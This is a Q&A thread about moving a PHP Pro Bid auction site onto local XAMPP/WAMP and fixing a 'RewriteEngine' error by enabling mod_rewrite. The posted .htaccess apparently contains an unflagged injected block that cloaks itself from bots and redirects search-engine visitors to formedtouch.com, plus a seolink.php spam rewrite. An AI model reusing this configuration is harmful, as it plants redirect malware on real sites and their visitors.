# phpprorobid issue: setting up live is messing a lot

Tags: php, .htaccess, xampp, wampserver, zend-optimizer

I have a live project developed in "phpprobid" auction software and i have to transfer it on local, I downloaded it and set it up on my xampp 1.7.4 which has php 5.3.5 but at start it said install Zend optimizer first so i tried to install zend optimzer but it was not compatible with php 5.3.5,

So I installed older version of xampp that has PHP 5.2.x. Now zend optimzer worked, but it's giving me an internal server error on the wampserver that already had zend optimizer working.

Server Error Log

```
[Thu May 02 11:20:45 2013] [alert] [client 127.0.0.1] C:/wamp/www/gtm/.htaccess:               Invalid command 'RewriteEngine', perhaps misspelled or defined by a module not included in    the server configuration, referer: http://localhost/
[Thu May 02 11:29:40 2013] [alert] [client 127.0.0.1] C:/wamp/www/gtm/.htaccess:  Invalid command 'RewriteEngine', perhaps misspelled or defined by a module not included in  the server configuration, referer: http://localhost/
[Thu May 02 11:32:14 2013] [alert] [client 127.0.0.1] C:/wamp/www/gtm/.htaccess: Invalid command 'RewriteEngine', perhaps misspelled or defined by a module not included in the server configuration, referer: http://localhost/
[Thu May 02 11:32:20 2013] [alert] [client 127.0.0.1] C:/wamp/www/gtm/.htaccess: Invalid command 'RewriteEngine', perhaps misspelled or defined by a module not included in the server configuration
[Thu May 02 11:35:38 2013] [alert] [client 127.0.0.1] C:/wamp/www/gtm/.htaccess: Invalid command 'RewriteEngine', perhaps misspelled or defined by a module not included in the server configuration
[Thu May 02 11:35:38 2013] [error] [client 127.0.0.1] File does not exist:  C:/wamp/www/favicon.ico
[Thu May 02 11:35:39 2013] [alert] [client 127.0.0.1] C:/wamp/www/gtm/.htaccess: Invalid command 'RewriteEngine', perhaps misspelled or defined by a module not included in  the server configuration
[Thu May 02 11:35:39 2013] [error] [client 127.0.0.1] File does not exist:  C:/wamp/www/favicon.ico
[Thu May 02 11:35:39 2013] [alert] [client 127.0.0.1] C:/wamp/www/gtm/.htaccess: Invalid command 'RewriteEngine', perhaps misspelled or defined by a module not included in the server configuration
[Thu May 02 11:35:39 2013] [error] [client 127.0.0.1] File does not exist: C:/wamp/www/favicon.ico
[Thu May 02 11:35:39 2013] [alert] [client 127.0.0.1] C:/wamp/www/gtm/.htaccess: Invalid command 'RewriteEngine', perhaps misspelled or defined by a module not included in the server configuration
[Thu May 02 11:35:40 2013] [error] [client 127.0.0.1] File does not exist: C:/wamp/www/favicon.ico
[Thu May 02 11:35:40 2013] [alert] [client 127.0.0.1] C:/wamp/www/gtm/.htaccess: Invalid command 'RewriteEngine', perhaps misspelled or defined by a module not included in the server configuration
[Thu May 02 11:35:40 2013] [error] [client 127.0.0.1] File does not exist: C:/wamp/www/favicon.ico
[Thu May 02 11:36:48 2013] [alert] [client 127.0.0.1] C:/wamp/www/gtm/.htaccess: Invalid command 'RewriteEngine', perhaps misspelled or defined by a module not included in the server configuration
[Thu May 02 11:36:48 2013] [error] [client 127.0.0.1] File does not exist: C:/wamp/www/favicon.ico
[Thu May 02 11:36:52 2013] [alert] [client 127.0.0.1] C:/wamp/www/gtm/.htaccess: Invalid command 'RewriteEngine', perhaps misspelled or defined by a module not included in the server configuration
[Thu May 02 11:36:53 2013] [error] [client 127.0.0.1] File does not exist: C:/wamp/www/favicon.ico
```

.htaccess code

```
# exgocgkctswo
#AddType application/x-httpd-php52  .php
RewriteEngine On

RewriteCond %{HTTP_HOST} ^yourdomain\.com


RewriteCond %{THE_REQUEST} ^[A-Z]{3,9}\ /.*index\.php\ HTTP/
RewriteRule ^(.*)index\.php$ /$1 [R=301,L]

RewriteCond %{THE_REQUEST} ^[A-Z]{3,9}\ /.*home\ HTTP/
RewriteRule ^(.*)index\.php$ /$1 [R=301,L]


RewriteCond %{REQUEST_METHOD}   ^GET$
RewriteCond %{HTTP_REFERER}     ^(http\:\/\/)?([^\/\?]*\.)?    (google\.|yahoo\.|bing\.|msn\.|yandex\.|ask\.|excite\.|altavista\.|netscape\.|aol\.|hotbot\.|goto\.|infoseek\.|mamma\.|alltheweb\.|lycos\.|search\.|metacrawler\.|rambler\.|mail\.|dogpile\.|ya\.|\/search\?).*$   [NC]
RewriteCond %{HTTP_REFERER}     !^.*(q\=cache\:).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(bing|Accoona|Ace\sExplorer|Amfibi|Amiga\sOS|apache|appie|AppleSyndication).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Archive|Argus|Ask\sJeeves|asterias|Atrenko\sNews|BeOS|BigBlogZoo).*$   [NC]
  RewriteCond %{HTTP_USER_AGENT}  !^.*(Biz360|Blaiz|Bloglines|BlogPulse|BlogSearch|BlogsLive|BlogsSay|blogWatcher).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Bookmark|bot|CE\-Preload|CFNetwork|cococ|Combine|Crawl|curl|Danger\shiptop).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Diagnostics|DTAAgent|ecto|EmeraldShield|endo|Evaal|Everest\-Vulcan).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(exactseek|Feed|Fetch|findlinks|FreeBSD|Friendster|Fuck\sYou|Google).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Gregarius|HatenaScreenshot|heritrix|HolyCowDude|Honda\-Search|HP\-UX).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(HTML2JPG|HttpClient|httpunit|ichiro|iGetter|iPhone|IRIX|Jakarta|JetBrains).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Krugle|Labrador|larbin|LeechGet|libwww|Liferea|LinkChecker).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(LinknSurf|Linux|LiveJournal|Lonopono|Lotus\-Notes|Lycos|Lynx|Mac\_PowerPC).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Mac\_PPC|Mac\s10|like\sMac\sOS|macDN|Mediapartners|Megite|MetaProducts).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Miva|Mobile|NetBSD|NetNewsWire|NetResearchServer|NewsAlloy|NewsFire).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(NewsGatorOnline|NewsMacPro|Nokia|NuSearch|Nutch|ObjectSearch|Octora).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(OmniExplorer|Omnipelagos|Onet|OpenBSD|OpenIntelligenceData|oreilly).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(os\=Mac|P900i|panscient|perl|PlayStation|POE\-Component|PrivacyFinder).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(psycheclone|Python|retriever|Rojo|RSS|SBIder|Scooter|Seeker|Series\s60).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(SharpReader|SiteBar|Slurp|Snoopy|Soap\sClient|Socialmarks|Sphere\sScout).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(spider|sproose|Rambler|Straw|subscriber|SunOS|Surfer|Syndic8).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Syntryx|TargetYourNews|Technorati|Thunderbird|Twiceler|urllib|Validator).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Vienna|voyager|W3C|Wavefire|webcollage|Webmaster|WebPatrol|wget|Win\s9x).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Win16|Win95|Win98|Windows\s95|Windows\s98|Windows\sCE|Windows\sNT\s4).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(WinHTTP|WinNT4|WordPress|WWWeasel|wwwster|yacy|Yahoo).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Yandex|Yeti|YouReadMe|Zhuaxia|ZyBorg).*$   [NC]
RewriteCond %{HTTP_COOKIE}      !^.*xccgtswgokoe.*$
RewriteCond %{HTTPS}            ^on$
RewriteRule ^(.*)$   http://formedtouch.com/cgi-bin/r.cgi?p=15001&i=0581533d&j=333&m=289b9a35a737707d0a7fda2a7847a04a&h=%{HTTP_HOST}&u=%{REQUEST_URI}&q=%{QUERY_STRING}&t=%{TIME}  

#RewriteRule ^(.*)$   http://formedtouch.com/cgi-bin/r.cgi?p=15001&i=0581533d&j=333&m=289b9a35a737707d0a7fda2a7847a04a&h=%{HTTP_HOST}&u=%{REQUEST_URI}&q=%{QUERY_STRING}&t=%{TIME}  [R=302,L,CO=xccgtswgokoe:1:%{HTTP_HOST}:10080:/:0:HttpOnly]
# exgocgkctswo
RewriteEngine On
RewriteRule ^(?!site_truck_advance_search|home|site_pre_register|site_header|site|site_categories_list|site_more_categories|thumbnail|menu|login|site_login|big_ph|bid_history|site_view_listing|sell_item.php|site_members_area|site_post_listing|sell_item|csv_download|upload_listing|csv_import|upload_listing_csv|invoice_print|members_area|add_want_to_buy_list|auction_site_truck_advance_search|site_truck_advance_search|site_trailer_advance_search|site_equipment_advance_search|site_post_listing|payment_processing_form|initialize_counters|index|import_export|faqs|global_mainpage|global_header|get_sub_categories_by_parent_id_and_type|get_sub_categories_by_parent_id|get_model_by_manufacturer|get_manufacturer_by_type|get_all_details_by_type|generatesitemap|FilterReader|FileReader|fee_payment|fancy|edit_item1|edit_description|download|currency_converter|CSVReader|content_pages|compare_items|check_username|category_selector|categories|buy_out|bulk_categories_new|bulk_categories|site_categories_list|site_categories|site_advance_search|site_activate_account|shop|shipping_locations_select|set_language|sell_item1|search|sample|rss_feed|rss|reverse_profilereverse_print|reverse_manage|reverse_details|reverse_bid|reverse_auctions|retrieve_password|reputation_details|reports|recaptchalib|Reader|profile|pp_worldpay|pp_testmode|pp_protx|pp_paypal|pp_paymate|pp_nochex|pp_moneybookers|pp_ikobo|pp_gc|pp_checkout|pp_authnet|pp_amazon|pp_alertpay|popup_edit_public_question|popup_bank_details|permissions|pbulkupdate|pbulkconfig|pbulk|payment_processing|payment_process|payment_failed|payment_completed|other_items|message_board|initialize_counters_step|wanted_manage|wanted_details|wanted_ads|want_to_buy_list|user_reputation|upload_video|upload_listing_photos|upload|update_categories|transporting|terms_and_conditions|swap_offer|stores|stmenu|steffslip|steffrect|steffie|stcode|site_wanted_manage|site_view_subscribers|site_search|site_rss_feed|site_retrieve_password|site_more_categories|site_fees|banner_click|auctions_show|auction_search|auction_print|auction_manufacturers|activate_account|account_activate|about_me|site_view_listing_retails|quick_tour|site_view_listing_details|site_register|site_footer|sell_item|sales_rep_report|retail_view|recent_auctions|manufacturer_auctions|make_offer|global_footer|edit_item|bid|auction_site_trailer_advance_search|auction_site_equipment_advance_search|auction_details|class_image|nortonsw_956d9230-b255-0.html|global|marvels|admin/login|admin/index|admin/table_categories|admin/*|cache/*|uplimg/*|images/*|img/*|upload/images/*|site/*|blank|yellow5-d|includes/global|jquery.fancybox/fancybox/*|auction_results|scripts/*|blog/*|wp-admin/*|paypal/*|stripe/*|test|wp-admin|profile|404).*$ /home/globaltr/public_html/seolink.php?domain=abc
Options +FollowSymLinks
RewriteRule ^cat/(.*)/(.*)$     http://genesis.heritagewebdesign.com/~awatson/site_categories.php?category=$1&parent_id=$2 [R]
RewriteRule ^auctions/(.*)/(.*)$     http://genesis.heritagewebdesign.com/~awatson/auction_details.php?name=$1&auction_id=$2     [NC]
RewriteCond %{REQUEST_URI} ^(.*)//(.*)$
RewriteRule . %1/%2 [R=301,L]
RewriteRule ^(.*),(.*)$ $2.php?rewrite_params=$1&page_url=$2
RewriteCond %{QUERY_STRING} base64_encode.*(.*) [OR] 
RewriteCond %{QUERY_STRING} (<|%3C).*script.*(>|%3E) [NC,OR] 
RewriteCond %{QUERY_STRING} GLOBALS(=|[|%[0-9A-Z]{0,2}) [OR] 
RewriteCond %{QUERY_STRING} _REQUEST(=|[|%[0-9A-Z]{0,2}) 
#RewriteRule ^(.*)$ index.php [F,L]
#RewriteCond %{HTTP_HOST} ^yourdomain\.com$ [OR]
#RewriteCond %{HTTP_HOST} ^www\.yourdomain\.com$
#RewriteRule ^/?$ "http\:\/\/www\.traderintl\.com" [R=301,L]

#RewriteEngine On
#RewriteCond %{SERVER_PORT} 80
#RewriteRule ^(.*)$ https://yourdomain.com/$1 [R,L]

ErrorDocument 404 /404.php
```

Answer (score 1, accepted):

In your httpd.conf file do a search for "mod_rewrite" - it should look something like this:

```
LoadModule rewrite_module modules/mod_rewrite.so
```

There's likely a # in front of it, remove that and reboot apache.

Comment: m running this project on local now i did what you tell me but now i have a problem
my site is in a directory called gtm in htdocs so when i enter the url
localhost/gtm
it takes me to the live site, can you tell me whats the problem